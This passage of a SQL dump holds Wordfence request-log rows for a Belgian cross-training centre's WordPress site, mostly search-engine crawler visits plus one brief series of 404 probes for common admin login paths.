(77911, 1524577915.957643, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77912, 1524834106.854406, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77913, 1525128971.872237, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77914, 1525273858.068940, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77915, 1525273858.707608, 1123635045, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/deadwmiuhcbmro.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77916, 1525954452.040788, 1123633950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77917, 1525954452.612886, 1123633950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77918, 1525962454.013026, 1123633950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77919, 1525962482.616355, 1123633950, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77920, 1525965116.062258, 1123633950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77921, 1526012351.917736, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77922, 1526047919.048927, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77923, 1526047919.683905, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77924, 1526154954.970145, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77925, 1526154955.568377, 1123631127, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/cdepnyydefyywzod.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77926, 1526172957.222309, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77927, 1526248562.221403, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77928, 1526248563.141587, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77929, 1526321874.206828, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77930, 1526587673.427322, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77931, 1526587673.973648, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77932, 1526674157.503295, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77933, 1526724657.672697, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77934, 1526727509.379871, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77935, 1526727519.212577, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77936, 1526727524.149170, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77937, 1526727538.452497, 1123631813, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77938, 1526730182.841536, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77939, 1526730183.416455, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77940, 1526733598.233874, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77941, 1526766621.267805, 3587411701, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'),
(77942, 1526766623.807563, 3587411701, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'),
(77943, 1526794372.747918, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77944, 1526794373.247466, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77945, 1526794558.093364, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77946, 1526829142.097234, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77947, 1526832226.402252, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77948, 1526932086.548566, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77949, 1527053635.848095, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77950, 1527053636.363492, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77951, 1527086825.475910, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77952, 1527239761.688572, 3639886562, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(77953, 1527240231.140794, 3639886562, 0, 1, 0, 0, 1, 'http://www2.crosstrainingcenter.be/contact-2/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(77954, 1527334017.717690, 3639886537, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(77955, 1527334405.851162, 3639886537, 0, 1, 0, 0, 1, 'http://www2.crosstrainingcenter.be/contact-2/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(77956, 1527587711.215899, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77957, 1527587711.765912, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77958, 1527594570.269900, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77959, 1527696336.844186, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77960, 1527696337.475214, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77961, 1527700086.995305, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77962, 1527705088.229485, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77963, 1527705994.618423, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77964, 1527751776.053592, 2954829496, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/administrator/', '', 'Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1'),
(77965, 1527751776.624514, 2954829496, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/admin.php', '', 'Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1'),
(77966, 1527751777.353082, 2954829496, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/bitrix/admin/?lang=en', '', 'Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1'),
(77967, 1527751777.833194, 2954829496, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/admin/login.php', '', 'Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1'),
(77968, 1527751778.291962, 2954829496, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/admin/', '', 'Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(77969, 1527751779.293405, 2954829496, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/user/', '', 'Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1'),
(77970, 1527789861.965060, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77971, 1529304968.284693, 1123632542, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77972, 1529304968.824927, 1123632542, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/rwnokycpbjhrm.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77973, 1529324932.733096, 1123632542, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77974, 1529333200.956792, 1123632542, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77975, 1529758684.401369, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77976, 1529758756.192193, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77977, 1529965991.819020, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77978, 1530019746.331210, 1123631813, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(77979, 1530054170.485394, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77980, 1530283206.846859, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77981, 1530320242.113726, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77982, 1530354391.538426, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77983, 1530465923.889931, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77984, 1530465924.408289, 1123631752, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/cysnhymxivwxsu.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77985, 1530541870.077067, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77986, 1531260578.621370, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77987, 1531260579.154627, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77988, 1531596459.749573, 1123633950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77989, 1531596460.269163, 1123633950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77990, 1531607866.523603, 1123633950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77991, 1532015136.632182, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77992, 1532015137.131836, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77993, 1532019965.563936, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77994, 1532019966.112415, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77995, 1532019977.484556, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77996, 1532019991.173721, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77997, 1532020006.056232, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77998, 1532020026.399107, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77999, 1532020054.657360, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78000, 1532020119.707650, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78001, 1532027281.647576, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78002, 1532030934.151371, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78003, 1532042162.009931, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78004, 1532042218.576583, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78005, 1532042284.032299, 1123632611, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78006, 1532067182.610493, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78007, 1532095224.202101, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78008, 1532108657.472879, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78009, 1532108658.055988, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78010, 1532415628.455048, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78011, 1532486370.103095, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78012, 1532509993.742569, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78013, 1532509994.224448, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
